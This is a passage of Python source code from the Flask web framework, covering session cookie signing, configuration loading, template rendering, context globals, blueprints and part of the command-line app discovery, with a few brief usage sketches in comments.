serializer = session_json_serializer session_class = SecureCookieSession def get_signing_serializer(self, app: Flask) -> URLSafeTimedSerializer | None: if not app.secret_key: return None signer_kwargs = dict( key_derivation=self.key_derivation, digest_method=self.digest_method ) return URLSafeTimedSerializer( app.secret_key, salt=self.salt, serializer=self.serializer, signer_kwargs=signer_kwargs, ) def open_session(self, app: Flask, request: Request) -> SecureCookieSession | None: s = self.get_signing_serializer(app) if s is None: return None val = request.cookies.get(self.get_cookie_name(app)) if not val: return self.session_class() max_age = int(app.permanent_session_lifetime.total_seconds()) try: data = s.loads(val, max_age=max_age) return self.session_class(data) except BadSignature: return self.session_class() def save_session( self, app: Flask, session: SessionMixin, response: Response ) -> None: name = self.get_cookie_name(app) domain = self.get_cookie_domain(app) path = self.get_cookie_path(app) secure = self.get_cookie_secure(app) samesite = self.get_cookie_samesite(app) httponly = self.get_cookie_httponly(app) # Add a "Vary: Cookie" header if the session was accessed at all. if session.accessed: response.vary.add("Cookie") # If the session is modified to be empty, remove the cookie. # If the session is empty, return without setting the cookie. if not session: if session.modified: response.delete_cookie( name, domain=domain, path=path, secure=secure, samesite=samesite, httponly=httponly, ) response.vary.add("Cookie") return if not self.should_set_cookie(app, session): return expires = self.get_expiration_time(app, session) val = self.get_signing_serializer(app).dumps(dict(session)) # type: ignore[union-attr] response.set_cookie( name, val, expires=expires, httponly=httponly, domain=domain, path=path, secure=secure, samesite=samesite, ) response.vary.add("Cookie") File: src/flask/config.py from __future__ import annotations import errno import json import os import types import typing as t from werkzeug.utils import import_string if t.TYPE_CHECKING: import typing_extensions as te from .sansio.app import App T = t.TypeVar("T") class ConfigAttribute(t.Generic[T]): """Makes an attribute forward to the config""" def __init__( self, name: str, get_converter: t.Callable[[t.Any], T] | None = None ) -> None: self.__name__ = name self.get_converter = get_converter @t.overload def __get__(self, obj: None, owner: None) -> te.Self: ... @t.overload def __get__(self, obj: App, owner: type[App]) -> T: ... def __get__(self, obj: App | None, owner: type[App] | None = None) -> T | te.Self: if obj is None: return self rv = obj.config[self.__name__] if self.get_converter is not None: rv = self.get_converter(rv) return rv # type: ignore[no-any-return] def __set__(self, obj: App, value: t.Any) -> None: obj.config[self.__name__] = value class Config(dict): # type: ignore[type-arg] """Works exactly like a dict but provides ways to fill it from files or special dictionaries. There are two common patterns to populate the config. Either you can fill the config from a config file:: app.config.from_pyfile('yourconfig.cfg') Or alternatively you can define the configuration options in the module that calls :meth:`from_object` or provide an import path to a module that should be loaded. 
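# Sketch of the class-based ``from_object`` pattern the docstring above
# describes; the class and file names are made up for illustration. Only
# uppercase attributes end up in ``app.config``.
from flask import Flask


class DefaultConfig:
    DEBUG = False
    SECRET_KEY = "change-me"          # override in real deployments
    ignored_because_lowercase = True  # skipped by from_object


app = Flask(__name__)
app.config.from_object(DefaultConfig)
app.config.from_pyfile("production.cfg", silent=True)  # site-specific overrides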
It is also possible to tell it to use the same module and with that provide the configuration values just before the call:: DEBUG = True SECRET_KEY = 'development key' app.config.from_object(__name__) In both cases (loading from any Python file or loading from modules), only uppercase keys are added to the config. This makes it possible to use lowercase values in the config file for temporary values that are not added to the config or to define the config keys in the same file that implements the application. Probably the most interesting way to load configurations is from an environment variable pointing to a file:: app.config.from_envvar('YOURAPPLICATION_SETTINGS') In this case before launching the application you have to set this environment variable to the file you want to use. On Linux and OS X use the export statement:: export YOURAPPLICATION_SETTINGS='/path/to/config/file' On windows use `set` instead. :param root_path: path to which files are read relative from. When the config object is created by the application, this is the application's :attr:`~flask.Flask.root_path`. :param defaults: an optional dictionary of default values """ def __init__( self, root_path: str | os.PathLike[str], defaults: dict[str, t.Any] | None = None, ) -> None: super().__init__(defaults or {}) self.root_path = root_path def from_envvar(self, variable_name: str, silent: bool = False) -> bool: """Loads a configuration from an environment variable pointing to a configuration file. This is basically just a shortcut with nicer error messages for this line of code:: app.config.from_pyfile(os.environ['YOURAPPLICATION_SETTINGS']) :param variable_name: name of the environment variable :param silent: set to ``True`` if you want silent failure for missing files. :return: ``True`` if the file was loaded successfully. """ rv = os.environ.get(variable_name) if not rv: if silent: return False raise RuntimeError( f"The environment variable {variable_name!r} is not set" " and as such configuration could not be loaded. Set" " this variable and make it point to a configuration" " file" ) return self.from_pyfile(rv, silent=silent) def from_prefixed_env( self, prefix: str = "FLASK", *, loads: t.Callable[[str], t.Any] = json.loads ) -> bool: """Load any environment variables that start with ``FLASK_``, dropping the prefix from the env key for the config key. Values are passed through a loading function to attempt to convert them to more specific types than strings. Keys are loaded in :func:`sorted` order. The default loading function attempts to parse values as any valid JSON type, including dicts and lists. Specific items in nested dicts can be set by separating the keys with double underscores (``__``). If an intermediate key doesn't exist, it will be initialized to an empty dict. :param prefix: Load env vars that start with this prefix, separated with an underscore (``_``). :param loads: Pass each string value to this function and use the returned value as the config value. If any error is raised it is ignored and the value remains a string. The default is :func:`json.loads`. .. versionadded:: 2.1 """ prefix = f"{prefix}_" len_prefix = len(prefix) for key in sorted(os.environ): if not key.startswith(prefix): continue value = os.environ[key] try: value = loads(value) except Exception: # Keep the value as a string if loading failed. pass # Change to key.removeprefix(prefix) on Python >= 3.9. key = key[len_prefix:] if "__" not in key: # A non-nested key, set directly. 
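# Worked sketch of the behaviour ``from_prefixed_env`` implements here (the
# variable names and values are invented): each value is run through
# ``json.loads`` where possible, and ``__`` builds nested dictionaries.
import os

from flask import Flask

os.environ["FLASK_SECRET_KEY"] = "dev"  # not valid JSON -> kept as a string
os.environ["FLASK_MAIL__PORT"] = "25"   # parsed to int 25, nested under MAIL

app = Flask(__name__)
app.config.from_prefixed_env()
assert app.config["SECRET_KEY"] == "dev"
assert app.config["MAIL"] == {"PORT": 25}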
self[key] = value continue # Traverse nested dictionaries with keys separated by "__". current = self *parts, tail = key.split("__") for part in parts: # If an intermediate dict does not exist, create it. if part not in current: current[part] = {} current = current[part] current[tail] = value return True def from_pyfile( self, filename: str | os.PathLike[str], silent: bool = False ) -> bool: """Updates the values in the config from a Python file. This function behaves as if the file was imported as module with the :meth:`from_object` function. :param filename: the filename of the config. This can either be an absolute filename or a filename relative to the root path. :param silent: set to ``True`` if you want silent failure for missing files. :return: ``True`` if the file was loaded successfully. .. versionadded:: 0.7 `silent` parameter. """ filename = os.path.join(self.root_path, filename) d = types.ModuleType("config") d.__file__ = filename try: with open(filename, mode="rb") as config_file: exec(compile(config_file.read(), filename, "exec"), d.__dict__) except OSError as e: if silent and e.errno in (errno.ENOENT, errno.EISDIR, errno.ENOTDIR): return False e.strerror = f"Unable to load configuration file ({e.strerror})" raise self.from_object(d) return True def from_object(self, obj: object | str) -> None: """Updates the values from the given object. An object can be of one of the following two types: - a string: in this case the object with that name will be imported - an actual object reference: that object is used directly Objects are usually either modules or classes. :meth:`from_object` loads only the uppercase attributes of the module/class. A ``dict`` object will not work with :meth:`from_object` because the keys of a ``dict`` are not attributes of the ``dict`` class. Example of module-based configuration:: app.config.from_object('yourapplication.default_config') from yourapplication import default_config app.config.from_object(default_config) Nothing is done to the object before loading. If the object is a class and has ``@property`` attributes, it needs to be instantiated before being passed to this method. You should not use this function to load the actual configuration but rather configuration defaults. The actual config should be loaded with :meth:`from_pyfile` and ideally from a location not within the package because the package might be installed system wide. See :ref:`config-dev-prod` for an example of class-based configuration using :meth:`from_object`. :param obj: an import name or object """ if isinstance(obj, str): obj = import_string(obj) for key in dir(obj): if key.isupper(): self[key] = getattr(obj, key) def from_file( self, filename: str | os.PathLike[str], load: t.Callable[[t.IO[t.Any]], t.Mapping[str, t.Any]], silent: bool = False, text: bool = True, ) -> bool: """Update the values in the config from a file that is loaded using the ``load`` parameter. The loaded data is passed to the :meth:`from_mapping` method. .. code-block:: python import json app.config.from_file("config.json", load=json.load) import tomllib app.config.from_file("config.toml", load=tomllib.load, text=False) :param filename: The path to the data file. This can be an absolute path or relative to the config root path. :param load: A callable that takes a file handle and returns a mapping of loaded data from the file. :type load: ``Callable[[Reader], Mapping]`` where ``Reader`` implements a ``read`` method. :param silent: Ignore the file if it doesn't exist. 
:param text: Open the file in text or binary mode. :return: ``True`` if the file was loaded successfully. .. versionchanged:: 2.3 The ``text`` parameter was added. .. versionadded:: 2.0 """ filename = os.path.join(self.root_path, filename) try: with open(filename, "r" if text else "rb") as f: obj = load(f) except OSError as e: if silent and e.errno in (errno.ENOENT, errno.EISDIR): return False e.strerror = f"Unable to load configuration file ({e.strerror})" raise return self.from_mapping(obj) def from_mapping( self, mapping: t.Mapping[str, t.Any] | None = None, **kwargs: t.Any ) -> bool: """Updates the config like :meth:`update` ignoring items with non-upper keys. :return: Always returns ``True``. .. versionadded:: 0.11 """ mappings: dict[str, t.Any] = {} if mapping is not None: mappings.update(mapping) mappings.update(kwargs) for key, value in mappings.items(): if key.isupper(): self[key] = value return True def get_namespace( self, namespace: str, lowercase: bool = True, trim_namespace: bool = True ) -> dict[str, t.Any]: """Returns a dictionary containing a subset of configuration options that match the specified namespace/prefix. Example usage:: app.config['IMAGE_STORE_TYPE'] = 'fs' app.config['IMAGE_STORE_PATH'] = '/var/app/images' app.config['IMAGE_STORE_BASE_URL'] = 'http://img.website.com' image_store_config = app.config.get_namespace('IMAGE_STORE_') The resulting dictionary `image_store_config` would look like:: { 'type': 'fs', 'path': '/var/app/images', 'base_url': 'http://img.website.com' } This is often useful when configuration options map directly to keyword arguments in functions or class constructors. :param namespace: a configuration namespace :param lowercase: a flag indicating if the keys of the resulting dictionary should be lowercase :param trim_namespace: a flag indicating if the keys of the resulting dictionary should not include the namespace .. versionadded:: 0.11 """ rv = {} for k, v in self.items(): if not k.startswith(namespace): continue if trim_namespace: key = k[len(namespace) :] else: key = k if lowercase: key = key.lower() rv[key] = v return rv def __repr__(self) -> str: return f"<{type(self).__name__} {dict.__repr__(self)}>" File: src/flask/templating.py from __future__ import annotations import typing as t from jinja2 import BaseLoader from jinja2 import Environment as BaseEnvironment from jinja2 import Template from jinja2 import TemplateNotFound from .globals import _cv_app from .globals import _cv_request from .globals import current_app from .globals import request from .helpers import stream_with_context from .signals import before_render_template from .signals import template_rendered if t.TYPE_CHECKING: # pragma: no cover from .app import Flask from .sansio.app import App from .sansio.scaffold import Scaffold def _default_template_ctx_processor() -> dict[str, t.Any]: """Default template context processor. Injects `request`, `session` and `g`. """ appctx = _cv_app.get(None) reqctx = _cv_request.get(None) rv: dict[str, t.Any] = {} if appctx is not None: rv["g"] = appctx.g if reqctx is not None: rv["request"] = reqctx.request rv["session"] = reqctx.session return rv class Environment(BaseEnvironment): """Works like a regular Jinja2 environment but has some additional knowledge of how Flask's blueprint works so that it can prepend the name of the blueprint to referenced templates if necessary. 
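# Rough illustration (module layout and template names are hypothetical) of
# the blueprint-aware lookup this environment and the DispatchingJinjaLoader
# below provide: the application's template folder is searched first, then
# each registered blueprint's ``template_folder``.
from flask import Blueprint, Flask, render_template

bp = Blueprint("admin", __name__, template_folder="templates")

app = Flask(__name__)
app.register_blueprint(bp, url_prefix="/admin")


@app.route("/dashboard")
def dashboard():
    # Found in the app's templates/ folder if present there, otherwise in the
    # blueprint's template folder.
    return render_template("dashboard.html")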
""" def __init__(self, app: App, **options: t.Any) -> None: if "loader" not in options: options["loader"] = app.create_global_jinja_loader() BaseEnvironment.__init__(self, **options) self.app = app class DispatchingJinjaLoader(BaseLoader): """A loader that looks for templates in the application and all the blueprint folders. """ def __init__(self, app: App) -> None: self.app = app def get_source( self, environment: BaseEnvironment, template: str ) -> tuple[str, str | None, t.Callable[[], bool] | None]: if self.app.config["EXPLAIN_TEMPLATE_LOADING"]: return self._get_source_explained(environment, template) return self._get_source_fast(environment, template) def _get_source_explained( self, environment: BaseEnvironment, template: str ) -> tuple[str, str | None, t.Callable[[], bool] | None]: attempts = [] rv: tuple[str, str | None, t.Callable[[], bool] | None] | None trv: None | (tuple[str, str | None, t.Callable[[], bool] | None]) = None for srcobj, loader in self._iter_loaders(template): try: rv = loader.get_source(environment, template) if trv is None: trv = rv except TemplateNotFound: rv = None attempts.append((loader, srcobj, rv)) from .debughelpers import explain_template_loading_attempts explain_template_loading_attempts(self.app, template, attempts) if trv is not None: return trv raise TemplateNotFound(template) def _get_source_fast( self, environment: BaseEnvironment, template: str ) -> tuple[str, str | None, t.Callable[[], bool] | None]: for _srcobj, loader in self._iter_loaders(template): try: return loader.get_source(environment, template) except TemplateNotFound: continue raise TemplateNotFound(template) def _iter_loaders(self, template: str) -> t.Iterator[tuple[Scaffold, BaseLoader]]: loader = self.app.jinja_loader if loader is not None: yield self.app, loader for blueprint in self.app.iter_blueprints(): loader = blueprint.jinja_loader if loader is not None: yield blueprint, loader def list_templates(self) -> list[str]: result = set() loader = self.app.jinja_loader if loader is not None: result.update(loader.list_templates()) for blueprint in self.app.iter_blueprints(): loader = blueprint.jinja_loader if loader is not None: for template in loader.list_templates(): result.add(template) return list(result) def _render(app: Flask, template: Template, context: dict[str, t.Any]) -> str: app.update_template_context(context) before_render_template.send( app, _async_wrapper=app.ensure_sync, template=template, context=context ) rv = template.render(context) template_rendered.send( app, _async_wrapper=app.ensure_sync, template=template, context=context ) return rv def render_template( template_name_or_list: str | Template | list[str | Template], **context: t.Any, ) -> str: """Render a template by name with the given context. :param template_name_or_list: The name of the template to render. If a list is given, the first name to exist will be rendered. :param context: The variables to make available in the template. """ app = current_app._get_current_object() # type: ignore[attr-defined] template = app.jinja_env.get_or_select_template(template_name_or_list) return _render(app, template, context) def render_template_string(source: str, **context: t.Any) -> str: """Render a template from the given source string with the given context. :param source: The source code of the template to render. :param context: The variables to make available in the template. 
""" app = current_app._get_current_object() # type: ignore[attr-defined] template = app.jinja_env.from_string(source) return _render(app, template, context) def _stream( app: Flask, template: Template, context: dict[str, t.Any] ) -> t.Iterator[str]: app.update_template_context(context) before_render_template.send( app, _async_wrapper=app.ensure_sync, template=template, context=context ) def generate() -> t.Iterator[str]: yield from template.generate(context) template_rendered.send( app, _async_wrapper=app.ensure_sync, template=template, context=context ) rv = generate() # If a request context is active, keep it while generating. if request: rv = stream_with_context(rv) return rv def stream_template( template_name_or_list: str | Template | list[str | Template], **context: t.Any, ) -> t.Iterator[str]: """Render a template by name with the given context as a stream. This returns an iterator of strings, which can be used as a streaming response from a view. :param template_name_or_list: The name of the template to render. If a list is given, the first name to exist will be rendered. :param context: The variables to make available in the template. .. versionadded:: 2.2 """ app = current_app._get_current_object() # type: ignore[attr-defined] template = app.jinja_env.get_or_select_template(template_name_or_list) return _stream(app, template, context) def stream_template_string(source: str, **context: t.Any) -> t.Iterator[str]: """Render a template from the given source string with the given context as a stream. This returns an iterator of strings, which can be used as a streaming response from a view. :param source: The source code of the template to render. :param context: The variables to make available in the template. .. versionadded:: 2.2 """ app = current_app._get_current_object() # type: ignore[attr-defined] template = app.jinja_env.from_string(source) return _stream(app, template, context) File: src/flask/globals.py from __future__ import annotations import typing as t from contextvars import ContextVar from werkzeug.local import LocalProxy if t.TYPE_CHECKING: # pragma: no cover from .app import Flask from .ctx import _AppCtxGlobals from .ctx import AppContext from .ctx import RequestContext from .sessions import SessionMixin from .wrappers import Request _no_app_msg = """\ Working outside of application context. This typically means that you attempted to use functionality that needed the current application. To solve this, set up an application context with app.app_context(). See the documentation for more information.\ """ _cv_app: ContextVar[AppContext] = ContextVar("flask.app_ctx") app_ctx: AppContext = LocalProxy( # type: ignore[assignment] _cv_app, unbound_message=_no_app_msg ) current_app: Flask = LocalProxy( # type: ignore[assignment] _cv_app, "app", unbound_message=_no_app_msg ) g: _AppCtxGlobals = LocalProxy( # type: ignore[assignment] _cv_app, "g", unbound_message=_no_app_msg ) _no_req_msg = """\ Working outside of request context. This typically means that you attempted to use functionality that needed an active HTTP request. 
Consult the documentation on testing for information about how to avoid this problem.\ """ _cv_request: ContextVar[RequestContext] = ContextVar("flask.request_ctx") request_ctx: RequestContext = LocalProxy( # type: ignore[assignment] _cv_request, unbound_message=_no_req_msg ) request: Request = LocalProxy( # type: ignore[assignment] _cv_request, "request", unbound_message=_no_req_msg ) session: SessionMixin = LocalProxy( # type: ignore[assignment] _cv_request, "session", unbound_message=_no_req_msg ) File: src/flask/__init__.py from __future__ import annotations import typing as t from . import json as json from .app import Flask as Flask from .blueprints import Blueprint as Blueprint from .config import Config as Config from .ctx import after_this_request as after_this_request from .ctx import copy_current_request_context as copy_current_request_context from .ctx import has_app_context as has_app_context from .ctx import has_request_context as has_request_context from .globals import current_app as current_app from .globals import g as g from .globals import request as request from .globals import session as session from .helpers import abort as abort from .helpers import flash as flash from .helpers import get_flashed_messages as get_flashed_messages from .helpers import get_template_attribute as get_template_attribute from .helpers import make_response as make_response from .helpers import redirect as redirect from .helpers import send_file as send_file from .helpers import send_from_directory as send_from_directory from .helpers import stream_with_context as stream_with_context from .helpers import url_for as url_for from .json import jsonify as jsonify from .signals import appcontext_popped as appcontext_popped from .signals import appcontext_pushed as appcontext_pushed from .signals import appcontext_tearing_down as appcontext_tearing_down from .signals import before_render_template as before_render_template from .signals import got_request_exception as got_request_exception from .signals import message_flashed as message_flashed from .signals import request_finished as request_finished from .signals import request_started as request_started from .signals import request_tearing_down as request_tearing_down from .signals import template_rendered as template_rendered from .templating import render_template as render_template from .templating import render_template_string as render_template_string from .templating import stream_template as stream_template from .templating import stream_template_string as stream_template_string from .wrappers import Request as Request from .wrappers import Response as Response def __getattr__(name: str) -> t.Any: if name == "__version__": import importlib.metadata import warnings warnings.warn( "The '__version__' attribute is deprecated and will be removed in" " Flask 3.1. 
Use feature detection or" " 'importlib.metadata.version(\"flask\")' instead.", DeprecationWarning, stacklevel=2, ) return importlib.metadata.version("flask") raise AttributeError(name) File: src/flask/blueprints.py from __future__ import annotations import os import typing as t from datetime import timedelta from .cli import AppGroup from .globals import current_app from .helpers import send_from_directory from .sansio.blueprints import Blueprint as SansioBlueprint from .sansio.blueprints import BlueprintSetupState as BlueprintSetupState # noqa from .sansio.scaffold import _sentinel if t.TYPE_CHECKING: # pragma: no cover from .wrappers import Response class Blueprint(SansioBlueprint): def __init__( self, name: str, import_name: str, static_folder: str | os.PathLike[str] | None = None, static_url_path: str | None = None, template_folder: str | os.PathLike[str] | None = None, url_prefix: str | None = None, subdomain: str | None = None, url_defaults: dict[str, t.Any] | None = None, root_path: str | None = None, cli_group: str | None = _sentinel, # type: ignore ) -> None: super().__init__( name, import_name, static_folder, static_url_path, template_folder, url_prefix, subdomain, url_defaults, root_path, cli_group, ) #: The Click command group for registering CLI commands for this #: object. The commands are available from the ``flask`` command #: once the application has been discovered and blueprints have #: been registered. self.cli = AppGroup() # Set the name of the Click group in case someone wants to add # the app's commands to another CLI tool. self.cli.name = self.name def get_send_file_max_age(self, filename: str | None) -> int | None: """Used by :func:`send_file` to determine the ``max_age`` cache value for a given file path if it wasn't passed. By default, this returns :data:`SEND_FILE_MAX_AGE_DEFAULT` from the configuration of :data:`~flask.current_app`. This defaults to ``None``, which tells the browser to use conditional requests instead of a timed cache, which is usually preferable. Note this is a duplicate of the same method in the Flask class. .. versionchanged:: 2.0 The default configuration is ``None`` instead of 12 hours. .. versionadded:: 0.9 """ value = current_app.config["SEND_FILE_MAX_AGE_DEFAULT"] if value is None: return None if isinstance(value, timedelta): return int(value.total_seconds()) return value # type: ignore[no-any-return] def send_static_file(self, filename: str) -> Response: """The view function used to serve files from :attr:`static_folder`. A route is automatically registered for this view at :attr:`static_url_path` if :attr:`static_folder` is set. Note this is a duplicate of the same method in the Flask class. .. versionadded:: 0.5 """ if not self.has_static_folder: raise RuntimeError("'static_folder' must be set to serve static_files.") # send_file only knows to call get_send_file_max_age on the app, # call it here so it works for blueprints too. max_age = self.get_send_file_max_age(filename) return send_from_directory( t.cast(str, self.static_folder), filename, max_age=max_age ) def open_resource( self, resource: str, mode: str = "rb", encoding: str | None = "utf-8" ) -> t.IO[t.AnyStr]: """Open a resource file relative to :attr:`root_path` for reading. The blueprint-relative equivalent of the app's :meth:`~.Flask.open_resource` method. :param resource: Path to the resource relative to :attr:`root_path`. :param mode: Open the file in this mode. Only reading is supported, valid values are ``"r"`` (or ``"rt"``) and ``"rb"``. 
:param encoding: Open the file with this encoding when opening in text mode. This is ignored when opening in binary mode. .. versionchanged:: 3.1 Added the ``encoding`` parameter. """ if mode not in {"r", "rt", "rb"}: raise ValueError("Resources can only be opened for reading.") path = os.path.join(self.root_path, resource) if mode == "rb": return open(path, mode) return open(path, mode, encoding=encoding) File: src/flask/cli.py from __future__ import annotations import ast import collections.abc as cabc import importlib.metadata import inspect import os import platform import re import sys import traceback import typing as t from functools import update_wrapper from operator import itemgetter from types import ModuleType import click from click.core import ParameterSource from werkzeug import run_simple from werkzeug.serving import is_running_from_reloader from werkzeug.utils import import_string from .globals import current_app from .helpers import get_debug_flag from .helpers import get_load_dotenv if t.TYPE_CHECKING: import ssl from _typeshed.wsgi import StartResponse from _typeshed.wsgi import WSGIApplication from _typeshed.wsgi import WSGIEnvironment from .app import Flask class NoAppException(click.UsageError): """Raised if an application cannot be found or loaded.""" def find_best_app(module: ModuleType) -> Flask: """Given a module instance this tries to find the best possible application in the module or raises an exception. """ from . import Flask # Search for the most common names first. for attr_name in ("app", "application"): app = getattr(module, attr_name, None) if isinstance(app, Flask): return app # Otherwise find the only object that is a Flask instance. matches = [v for v in module.__dict__.values() if isinstance(v, Flask)] if len(matches) == 1: return matches[0] elif len(matches) > 1: raise NoAppException( "Detected multiple Flask applications in module" f" '{module.__name__}'. Use '{module.__name__}:name'" " to specify the correct one." ) # Search for app factory functions. for attr_name in ("create_app", "make_app"): app_factory = getattr(module, attr_name, None) if inspect.isfunction(app_factory): try: app = app_factory() if isinstance(app, Flask): return app except TypeError as e: if not _called_with_wrong_args(app_factory): raise raise NoAppException( f"Detected factory '{attr_name}' in module '{module.__name__}'," " but could not call it without arguments. Use" f" '{module.__name__}:{attr_name}(args)'" " to specify arguments." ) from e raise NoAppException( "Failed to find Flask application or factory in module" f" '{module.__name__}'. Use '{module.__name__}:name'" " to specify one." ) def _called_with_wrong_args(f: t.Callable[..., Flask]) -> bool: """Check whether calling a function raised a ``TypeError`` because the call failed or because something in the factory raised the error. :param f: The function that was called. :return: ``True`` if the call failed. """ tb = sys.exc_info()[2] try: while tb is not None: if tb.tb_frame.f_code is f.__code__: # In the function, it was called successfully. return False tb = tb.tb_next # Didn't reach the function. return True finally: # Delete tb to break a circular reference. # https://docs.python.org/2/library/sys.html#sys.exc_info del tb def find_app_by_string(module: ModuleType, app_name: str) -> Flask: """Check if the given string is a variable name or a function. Call a function to get the app instance, or return the variable directly. """ from . 
import Flask # Parse app_name as a single expression to determine if it's a valid # attribute name or function call. try: expr = ast.parse(app_name.strip(), mode="eval").body except SyntaxError: raise NoAppException( f"Failed to parse {app_name!r} as an attribute name or function call." ) from None if isinstance(expr, ast.Name): name = expr.id args = [] kwargs = {} elif isinstance(expr, ast.Call): # Ensure the function name is an attribute name only. if not isinstance(expr.func, ast.Name): raise NoAppException( f"Function reference must be a simple name: {app_name!r}." ) name = expr.func.id # Parse the positional and keyword arguments as literals. try: args = [ast.literal_eval(arg) for arg in expr.args] kwargs = { kw.arg: ast.literal_eval(kw.value) for kw in expr.keywords if kw.arg is not None } except ValueError: # literal_eval gives cryptic error messages, show a generic # message with the full expression instead. raise NoAppException( f"Failed to parse arguments as literal values: {app_name!r}." ) from None else: raise NoAppException( f"Failed to parse {app_name!r} as an attribute name or function call." ) try: attr = getattr(module, name) except AttributeError as e: raise NoAppException( f"Failed to find attribute {name!r} in {module.__name__!r}." ) from e # If the attribute is a function, call it with any args and kwargs # to get the real application. if inspect.isfunction(attr): try: app = attr(*args, **kwargs) except TypeError as e: if not _called_with_wrong_args(attr): raise raise NoAppException( f"The factory {app_name!r} in module" f" {module.__name__!r} could not be called with the" " specified arguments." ) from e else: app = attr if isinstance(app, Flask): return app raise NoAppException( "A valid Flask application was not obtained from" f" '{module.__name__}:{app_name}'." ) def prepare_import(path: str) -> str: """Given a filename this will try to calculate the python path, add it to the search path and return the actual module name that is expected. """ path = os.path.realpath(path) fname, ext = os.path.splitext(path) if ext == ".py": path = fname if os.path.basename(path) == "__init__": path = os.path.dirname(path) module_name = [] # move up until outside package structure (no __init__.py) while True: path, name = os.path.split(path) module_name.append(name) if not os.path.exists(os.path.join(path, "__init__.py")): break if sys.path[0] != path: sys.path.insert(0, path) return ".".join(module_name[::-1]) @t.overload def locate_app( module_name: str, app_name: str | None, raise_if_not_found: t.Literal[True] = True ) -> Flask: ... @t.overload def locate_app( module_name: str, app_name: str | None, raise_if_not_found: t.Literal[False] = ... ) -> Flask | None: ... def locate_app( module_name: str, app_name: str | None, raise_if_not_found: bool = True ) -> Flask | None: try: __import__(module_name) except ImportError: # Reraise the ImportError if it occurred within the imported module. # Determine this by checking whether the trace has a depth > 1. 
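# Illustration of the ``--app`` values the parsing above supports (the module
# and factory names are placeholders):
#
#   flask --app hello run                       # find app/application, or a create_app/make_app factory
#   flask --app hello:app2 run                  # ast.Name -> plain attribute lookup
#   flask --app "hello:create_app('dev')" run   # ast.Call -> literal args passed to the factory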
if sys.exc_info()[2].tb_next: # type: ignore[union-attr] raise NoAppException( f"While importing {module_name!r}, an ImportError was" f" raised:\n\n{traceback.format_exc()}" ) from None elif raise_if_not_found: raise NoAppException(f"Could not import {module_name!r}.") from None else: return None module = sys.modules[module_name] if app_name is None: return find_best_app(module) else: return find_app_by_string(module, app_name) def get_version(ctx: click.Context, param: click.Parameter, value: t.Any) -> None: if not value or ctx.resilient_parsing: return flask_version = importlib.metadata.version("flask") werkzeug_version = importlib.metadata.version("werkzeug") click.echo( f"Python {platform.python_version()}\n" f"Flask {flask_version}\n" f"Werkzeug {werkzeug_version}", color=ctx.color, ) ctx.exit() version_option = click.Option( ["--version"], help="Show the Flask version.", expose_value=False, callback=get_version, is_flag=True, is_eager=True, ) class ScriptInfo: """Helper object to deal with Flask applications. This is usually not necessary to interface with as it's used internally in the dispatching to click. In future versions of Flask this object will most likely play a bigger role. Typically it's created automatically by the :class:`FlaskGroup` but you can also manually create it and pass it onwards as click object. """ def __init__( self, app_import_path: str | None = None, create_app: t.Callable[..., Flask] | None = None, set_debug_flag: bool = True, ) -> None: #: Optionally the import path for the Flask application. self.app_import_path = app_import_path #: Optionally a function that is passed the script info to create #: the instance of the application. self.create_app = create_app #: A dictionary with arbitrary data that can be associated with #: this script info. self.data: dict[t.Any, t.Any] = {} self.set_debug_flag = set_debug_flag self._loaded_app: Flask | None = None def load_app(self) -> Flask: """Loads the Flask app (if not yet loaded) and returns it. Calling this multiple times will just result in the already loaded app to be returned. """ if self._loaded_app is not None: return self._loaded_app if self.create_app is not None: app: Flask | None = self.create_app() else: if self.app_import_path: path, name = ( re.split(r":(?![\\/])", self.app_import_path, maxsplit=1) + [None] )[:2] import_name = prepare_import(path) app = locate_app(import_name, name) else: for path in ("wsgi.py", "app.py"): import_name = prepare_import(path) app = locate_app(import_name, None, raise_if_not_found=False) if app is not None: break if app is None: raise NoAppException( "Could not locate a Flask application. Use the" " 'flask --app' option, 'FLASK_APP' environment" " variable, or a 'wsgi.py' or 'app.py' file in the" " current directory." ) if self.set_debug_flag: # Update the app's debug flag through the descriptor so that # other values repopulate as well. app.debug = get_debug_flag() self._loaded_app = app return app pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True) F = t.TypeVar("F", bound=t.Callable[..., t.Any]) def with_appcontext(f: F) -> F: """Wraps a callback so that it's guaranteed to be executed with the script's application context. Custom commands (and their options) registered under ``app.cli`` or ``blueprint.cli`` will always have an app context available, this decorator is not required in that case. .. versionchanged:: 2.2 The app context is active for subcommands as well as the decorated callback. 
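# Hedged sketch of a custom command (the command name and option are
# invented). Commands registered on ``app.cli`` are wrapped in
# ``with_appcontext`` automatically by ``AppGroup`` below, so ``current_app``
# is usable inside the function body.
import click
from flask import Flask, current_app

app = Flask(__name__)


@app.cli.command("seed")
@click.option("--count", default=10)
def seed(count: int) -> None:
    """Insert demo data (illustrative)."""
    click.echo(f"Seeding {count} rows for {current_app.name}")

# Invoked as: flask --app <module> seed --count 5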
The app context is always available to ``app.cli`` command and parameter callbacks. """ @click.pass_context def decorator(ctx: click.Context, /, *args: t.Any, **kwargs: t.Any) -> t.Any: if not current_app: app = ctx.ensure_object(ScriptInfo).load_app() ctx.with_resource(app.app_context()) return ctx.invoke(f, *args, **kwargs) return update_wrapper(decorator, f) # type: ignore[return-value] class AppGroup(click.Group): """This works similar to a regular click :class:`~click.Group` but it changes the behavior of the :meth:`command` decorator so that it automatically wraps the functions in :func:`with_appcontext`. Not to be confused with :class:`FlaskGroup`. """ def command( # type: ignore[override] self, *args: t.Any, **kwargs: t.Any ) -> t.Callable[[t.Callable[..., t.Any]], click.Command]: """This works exactly like the method of the same name on a regular :class:`click.Group` but it wraps callbacks in :func:`with_appcontext` unless it's disabled by passing ``with_appcontext=False``. """ wrap_for_ctx = kwargs.pop("with_appcontext", True) def decorator(f: t.Callable[..., t.Any]) -> click.Command: if wrap_for_ctx: f = with_appcontext(f) return super(AppGroup, self).command(*args, **kwargs)(f) # type: ignore[no-any-return] return decorator def group( # type: ignore[override] self, *args: t.Any, **kwargs: t.Any ) -> t.Callable[[t.Callable[..., t.Any]], click.Group]: """This works exactly like the method of the same name on a regular :class:`click.Group` but it defaults the group class to :class:`AppGroup`. """ kwargs.setdefault("cls", AppGroup) return super().group(*args, **kwargs) # type: ignore[no-any-return] def _set_app(ctx: click.Context, param: click.Option, value: str | None) -> str | None: if value is None: return None info = ctx.ensure_object(ScriptInfo) info.app_import_path = value return value # This option is eager so the app will be available if --help is given. # --help is also eager, so --app must be before it in the param list. # no_args_is_help bypasses eager processing, so this option must be # processed manually in that case to ensure FLASK_APP gets picked up. _app_option = click.Option( ["-A", "--app"], metavar="IMPORT", help=( "The Flask application or factory function to load, in the form 